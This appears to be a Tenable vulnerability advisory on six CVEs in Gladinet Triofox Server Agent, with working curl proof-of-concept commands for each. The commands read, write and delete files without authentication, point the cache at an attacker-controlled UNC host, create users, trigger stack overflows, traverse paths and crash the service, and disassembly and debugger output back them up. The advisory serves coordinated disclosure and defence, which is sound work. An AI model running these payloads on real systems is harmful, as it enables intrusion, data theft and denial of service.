Gladinet Triofox Server Agent Multiple Vulnerabilities

Critical

Synopsis

Multiple vulnerabilities exist in Gladinet Triofox Server Agent 17.1.10488.57063.

 

CVE-2026-8364 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

 

Gladinet Triofox Cloud Server Agent Access Service (GladServerAgentService.exe) listens on TCP port 7878 and processes remote HTTP messages with URL paths starting with /resources, /status, /sysinfo, /woshome, /Settings, /schedule, or /DavCache.

 

An unauthenticated remote attacker can interact with these endpoints to cause security issues. Some operations through these endpoints could trigger authenticated communications with the Triofox web portal (Access Point) with the credentials of the user currently logged into the Triofox Server Agent Management Console.  

 

The attacker can access the /resources endpoint to list, view, add, change, and delete files on the Triofox Drive (i.e., M:) mapped on the Server Agent host.

 

PoC:

 

# List content on the Triofox Drive
# <iscollection> indicates whether a returned resource is a file (0) or a directory (1) 
curl -s -X PROPFIND -H 'depth: 1' 'http://<target-host>:7878/resources' | xq | grep -Pi '(href|iscollection)'
    <a:href>/resources</a:href>
        <a:iscollection>1</a:iscollection>
    <a:href>/resources/share1</a:href>
        <a:iscollection>1</a:iscollection>
    <a:href>/resources/share2</a:href>
        <a:iscollection>1</a:iscollection>
        
curl -s -X PROPFIND -H 'depth: 1' 'http://<target-host>:7878/resources/share1' | xq | grep -Pi '(href|iscollection)'
    <a:href>/resources/share1</a:href>
        <a:iscollection>1</a:iscollection>
    <a:href>/resources/share1/dir1</a:href>
        <a:iscollection>1</a:iscollection>
    <a:href>/resources/share1/file1.txt</a:href>
        <a:iscollection>0</a:iscollection>


# Show content of an existing file on a published share
curl 'http://<target-host>:7878/resources/share1/file1.txt'
    
# Upload a malicious file to a published share
# - Require Personal Home Drive enabled in the Triofox web portal
curl -i -X PUT -d 'malicious content' 'http://<target-host>:7878/resources/share1/evil.exe'

# Change content of an existing file on a published share
# - Require Personal Home Drive enabled in the Triofox web portal
curl -i -X PUT -d 'original content replaced' 'http://<target-host>:7878/resources/share1/evil.exe'

# Delete an existing file on a published share
# - Require Personal Home Drive enabled in the Triofox web portal
curl -i -X DELETE 'http://<target-host>:7878/resources/share1/evil.exe'

 

The attacker can access the /Settings endpoint to list, view, add, change, and delete data in the GSettings table in the SQLite database C:\ProgramData\gteamclient\gsettings.db on the Server Agent host.

 

PoC:

 

# View settings 
curl 'http://<target-host>:7878/Settings'

# Change the existing CacheRoot setting
curl -i -H 'ValueType: 2' -H 'Value: \\<attacker-host>\share\cache' -X PUT  'http://<target-host>:7878/Settings/CacheRoot'

# Add a new setting (string type)
curl -i -H 'ValueType: 2' -H 'Value: ValueForNewSetting1' -X PUT  'http://<target-host>:7878/Settings/NewSetting1'

# Delete an existing setting
curl -i -H 'ValueType: 2' -H 'Value: {delete}' -X PUT  'http://<target-host>:7878/Settings/NewSetting1'

 

If the CacheRoot is changed to an attacker-controlled location (i.e., a UNC path), the attacker can view files in the mapped Triofox Drive (i.e., M:) on the server agent host if a user on the agent host opens those files.  This allows the attacker to view potentially sensitive files stored on external systems.

 

The attacker can access the other valid endpoints to perform potentially dangerous operations. For example, the /profile endpoint can used to perform various operations (i.e., AddUser, requestfile).  

 

PoC:

 

// Create a Proxied AD user.
//
// A random password is generated on creation.
// The password can be reset via the "Forgot your password?" link on the login page.
// Requirements:
//  - The "Allow proxied AD user to change native password (Non AD Password)" setting under
//    DASHBOARD > SETTINGS > USER ACCOUNT & SECURITY > USER ACCOUNT needs to be enabled.
//  - Personal Home Drive enabled.
//  - Workable Email Service configured in the web portal.
curl -i -H 'PMCMethod: AddUser' -d $'[email protected]\nSid123' 'http://<target-host>:7878/profile'

 

CVE-2026-8363 - Stack-based Buffer Overflow in WOSDeviceDropFolder.dll (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

 

A stack-based buffer overflow condition exists in WOSDeviceDropFolder.dll when processing a long URL path starting with /resources:

 

// WOSDeviceDropFolder.dll, file version 16.12.4797.56816, rebased to 0x03e70000 
[...]
.text:03E744F6  push    eax             ; attacker-controlled data after /resources/
.text:03E744F7  lea     eax, [ebp+538h+Buffer] ; VULN: fixed-sized stack buf ->
.text:03E744F7                          ; stack buf overflow!
.text:03E744FD  push    offset aGsyncS  ; "gsync_%s"
.text:03E74502  push    eax             ; Buffer
.text:03E74503  call    ds:sprintf
[...]

 

PoC:

 

curl 'http://<target-host>:7878/resources/'$(python -c "print('A'*270)")
STATUS_STACK_BUFFER_OVERRUN encountered
(14e8.1258): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=03e940d4 ecx=b7940000 edx=0678eca1 esi=00000000 edi=0678f794
eip=74b8257e esp=0678ee04 ebp=0678ee94 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
KERNELBASE!UnhandledExceptionFilter+0x8e:
74b8257e cc              int     3
0:024> 

 

CVE-2026-8362 - Stack-based Buffer Overflow in WOSDefaultHttpModule.dll (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

 

A stack-based buffer overflow condition exists in WOSDefaultHttpModule.dll when processing a long URL path starting with /woshome:

 

// WOSDefaultHttpModule.dll, file version 16.12.4797.56816, rebased to 0x166E0000 
[...]
.text:166E11D5  push    0FFFFFFFFh      ; MaxCount
.text:166E11D7  lea     eax, [ebx+DefaultHttpModule.ServerAgentDir] ; C:\Program Files\Triofox Server Agent\
.text:166E11DA  push    eax             ; Source
.text:166E11DB  lea     eax, [ebp+3B8h+FileName]
.text:166E11DE  push    207h            ; SizeInWords
.text:166E11E3  push    eax             ; Destination
.text:166E11E4  call    ds:wcsncpy_s
.text:166E11EA  lea     eax, [ebp+3B8h+FileName] ; fixed-size stack buf
.text:166E11ED  push    edi             ; attacker-controlled uri path
.text:166E11ED                          ; VULN: stack buffer overflow
.text:166E11ED                          ; VULN: path traversal
.text:166E11EE  push    eax
.text:166E11EF  call    ds:wcscat
[...]

 

PoC:

 

curl 'http://<target-host>:7878/woshome/'$(python -c "print('A'*511)")

 

CVE-2026-8361 - Path Traversal in WOSDefaultHttpModule.dll (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

 

A path traversal vulnerability exists in WOSDefaultHttpModule.dll when processing a URL path starting with /woshome (See code snippet above).

 

PoC:

 

curl --path-as-is  'http://<target-host>:7878/woshome/../../../../../../../../../../windows/win.ini'
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

 

CVE-2026-8360 - Unchecked Return Value to NULL Pointer Dereference DOS (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

 

Function calls to WOSCommonUtil.dll!WOSSysInfoGetDeviceInterface() in various DLLs (i.e., WOSProfileMgrModule.dll, WOSWebDavModule.dll) can return a NULL pointer (i.e., when no user is logged into the Triofox Server Agent Management Console).  The returned NULL pointer is not checked before being dereferenced:

 

// WOSProfileMgrModule.dll, file version 16.12.4797.56816, rebased to 0xB3D0000
[...]
.text:0B3D277F ProfileMgrModule_GetSyncFolderList proc near
.text:0B3D277F                          ; CODE XREF: ProfileMgrModule_ProcesssReq+88↓p
.text:0B3D277F  push    ebx
.text:0B3D2780  push    esi
.text:0B3D2781  push    edi
.text:0B3D2782  sub     esp, 10h
.text:0B3D2785  mov     esi, offset unk_B3D414C
.text:0B3D278A  mov     edi, esp
.text:0B3D278C  movsd
.text:0B3D278D  movsd
.text:0B3D278E  movsd
.text:0B3D278F  mov     ebx, ecx
.text:0B3D2791  movsd
.text:0B3D2792  call    ds:WOSSysInfoGetDeviceInterface
.text:0B3D2798  mov     edx, [eax]      ; VULN: returned pointer not checked for
.text:0B3D2798                          ; NULL before dereferencing
.text:0B3D279A  add     esp, 10h
.text:0B3D279D  mov     ecx, eax
.text:0B3D279F  call    dword ptr [edx+3Ch]
[...]

 

PoC:

 

curl -H 'PMCMethod: GetSyncFolderList' 'http://<target-host>:7878/profile'
curl: (56) Recv failure: Connection reset by peer

 

Crash in WinDbg:

 

(1f44.f48): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=04ac05a8 ecx=d0ea2ae0 edx=00000001 esi=0b3d415c edi=058dfc9c
eip=0b3d2798 esp=058dfc8c ebp=046eb96c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
WOSProfileMgrModule!WOSBin_UnloaHttpModule+0x177f:
0b3d2798 8b10            mov     edx,dword ptr [eax]  ds:002b:00000000=????????
0:010>

 

CVE-2026-8359 - WOSHttpStatusModule.dll NULL Function Pointer Call DoS (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

 

When processing a request with a URL path starting with /status or /sysinfo, WOSHttpStatusModule.dll is to be loaded to handle such URL patterns. The WOSBin_LoadHttpModule function in the dll would be called to set up a "module" object for that module. However, WOSHttpStatusModule.dll is not present in the installation. As a result, a function pointer to WOSBin_LoadHttpModule (which would have been in the export table in WOSHttpStatusModule.dll) is set to NULL, resulting in calling a function at address 0:

 

// WOSMiniWebServer.dll, file version 16.12.4797.56816, rebased to 0xB3B0000
[...]
.text:0B3B283F  call    [edi+HttpModuleInfo.pfnLoadHttpModule] ; NULL Function Pointer Call
[...]

 

PoC:

 

curl 'http://<target-host>:7878/status'
curl: (56) Recv failure: Connection reset by peer

 

Crash in WinDbg:

 

(1164.1054): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000008 ecx=00000002 edx=00000000 esi=04df1658 edi=04d6dcb4
eip=00000000 esp=05c3f7ec ebp=05c3f830 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
00000000 ??              ???
0:012> k
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 05c3f7e8 0b3b2845     0x0
01 05c3f830 0b3b26b3     WOSMiniWebServer!WOSBin_LoadDevice+0xbd5
02 05c3f858 0b3b26f2     WOSMiniWebServer!WOSBin_LoadDevice+0xa43
03 00000000 00000000     WOSMiniWebServer!WOSBin_LoadDevice+0xa82

Solution

Upgrade to version 17.3.10565.57509 or later.

Additional References

https://access.triofox.com/dashboard/releases_history/

Disclosure Timeline

February 11, 2026: Tenable sends request for security contact.
February 11, 2026: Gladinet replies with a security contact; Tenable sends disclosure.
February 25, 2026: Tenable asks Gladinet to confirm receipt of the disclosure.
February 25, 2026: Gladinet replies that they have received the disclosure and are implementing mitigations for the next release cycle. Gladinet notes that a typical deployment for the product is on internal, non-internet-facing file servers.
February 25, 2026: Tenable replies asking for timeline for next release cycle and clarifying points around host based firewall.
March 2, 2026: Gladinet replies that the port in question is used for local IPC and does not accept network connections.
April 2, 2026: Tenable replies that the default state of the service is bound to a non-local interface and requests an update.
April 15, 2026: Tenable inquires about a status update.
April 23, 2026: Gladinet replies that the issue was fixed in March.
April 29, 2026: Tenable asks what the fix version was, if a CVE was reserved and if there are release notes we can link to.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]